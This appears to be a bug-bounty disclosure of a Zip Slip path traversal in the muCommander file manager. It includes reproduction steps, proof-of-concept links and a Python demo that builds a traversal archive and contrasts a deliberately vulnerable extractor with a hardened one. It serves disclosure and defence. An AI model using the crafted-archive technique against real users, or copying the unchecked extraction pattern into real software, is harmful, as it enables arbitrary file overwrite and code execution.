Path Traversal in mucommander/mucommander

Valid

Reported on Feb 19th 2021


:book: Description

muCommander is a lightweight, cross-platform file manager with a dual-pane interface. The package is vulnerable to Zip Slip: when it unpacks an archive, entry names containing ../ sequences are joined to the destination directory without being checked, so a crafted archive can write files outside the directory chosen for extraction.

https://github.com/mucommander/mucommander
https://www.mucommander.com/

:recycle: Steps To Reproduce

  1. Download and run the latest release from https://github.com/mucommander/mucommander/releases/tag/0.9.6-1
  2. Unpack the supplied zip file with muCommander. Example archive used: https://drive.google.com/file/d/1nLjX6QuPj8G1nl2h8sU4c3RSuuICWIHY/view?usp=sharing
  3. Check where the extracted files landed: an entry whose name starts with ../ is written outside the directory chosen for extraction.

:telescope: POC

https://drive.google.com/file/d/1Rqsbr9_ijoHOa949B9Q1cM2jv8jb4zwV/view?usp=sharing

💥 Impact

Zip Slip (arbitrary file write/overwrite through path traversal in archive entry names). An attacker who can get a user to extract a crafted archive with muCommander can create or overwrite any file the muCommander process is allowed to write, which typically results in remote command execution, for example by overwriting a shell startup file or a library that is later loaded. No elevated privileges are needed: the write happens with the rights of the user running muCommander.
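The traversal the reproduction steps rely on, and the impact described above, reduced to runnable Python (an added example; this is not muCommander's Java code and it does not reproduce the project's fix). It builds a constructed archive carrying a ../../../evil.txt entry, audits the archive without extracting it, shows a naive extractor writing outside its destination, and refuses the same archive in the hardened form. All file names and directories are made up for the demonstration, and the escaping write is confined to a scratch directory under the system temp path.

```python
"""Zip Slip: build a traversal archive, audit it, and contrast a naive extractor
with a hardened one. Added example, not code from muCommander."""
import io
import os
import tempfile
import zipfile


def build_malicious_zip(depth: int = 3, payload: bytes = b"owned\n") -> bytes:
    """Return a constructed in-memory archive with one benign entry and one whose
    name climbs `depth` directories above the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "harmless\n")
        # writestr stores the name verbatim; the traversal only bites at extraction time
        zf.writestr("../" * depth + "evil.txt", payload)
    return buf.getvalue()


def resolves_inside(dest_dir: str, entry_name: str) -> bool:
    """True only if dest_dir/entry_name canonicalises to dest_dir or a path below it.
    The trailing separator stops a sibling such as dest_dir + '_evil' from passing;
    absolute entry names are caught too, since os.path.join discards dest_dir for them."""
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, entry_name))
    return target == dest or target.startswith(dest + os.sep)


def find_traversal_entries(zip_bytes: bytes, dest_dir: str) -> list:
    """Audit an archive without extracting it: names that would escape dest_dir."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if not resolves_inside(dest_dir, name)]


def naive_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """The vulnerable pattern: join the entry name to dest_dir and write, trusting
    whatever '../' the name contains. Returns the real paths that were written.
    (zipfile.extractall strips '..' components itself, which is why this writes by hand.)"""
    os.makedirs(dest_dir, exist_ok=True)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.join(dest_dir, info.filename)  # no check: this is the bug
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.realpath(target))
    return written


def safe_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """Hardened form: validate every entry name before writing anything, then extract
    to the canonical target. Raises ValueError if any entry would escape dest_dir."""
    bad = find_traversal_entries(zip_bytes, dest_dir)
    if bad:
        raise ValueError(f"zip slip: {bad[0]!r} escapes {dest_dir}")
    os.makedirs(dest_dir, exist_ok=True)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.realpath(os.path.join(dest_dir, info.filename))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors against the constructed archive inside a scratch tree, so the
    escaping write lands in the temp directory (three levels up) rather than anywhere real."""
    root = tempfile.mkdtemp(prefix="zipslip-")
    dest = os.path.join(root, "a", "b", "c", "extract")
    archive = build_malicious_zip(depth=3)
    naive_paths = naive_extract(archive, dest)
    try:
        safe_extract(archive, os.path.join(root, "safe"))
        safe_error = None
    except ValueError as exc:
        safe_error = str(exc)
    return {
        "flagged": find_traversal_entries(archive, dest),
        "naive_written": naive_paths,
        "escaped": [p for p in naive_paths if not resolves_inside(dest, p)],
        "expected_escape": os.path.realpath(os.path.join(root, "a", "evil.txt")),
        "safe_error": safe_error,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see where each file lands. The check that matters is canonicalising the joined path and comparing it against the destination plus a trailing separator; that rule is the same whether the extractor is written in Python or, as in muCommander, in Java, and checking the name string for ".." alone is not enough because absolute names and sibling-prefix names also escape.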

Arik Hadas validated this vulnerability a year ago
Abdul muhaimin has been awarded the disclosure bounty
The fix bounty is now up for grabs
Arik Hadas marked this as fixed with commit d1ae0d a year ago
Simon Siebert has been awarded the fix bounty
This vulnerability will not receive a CVE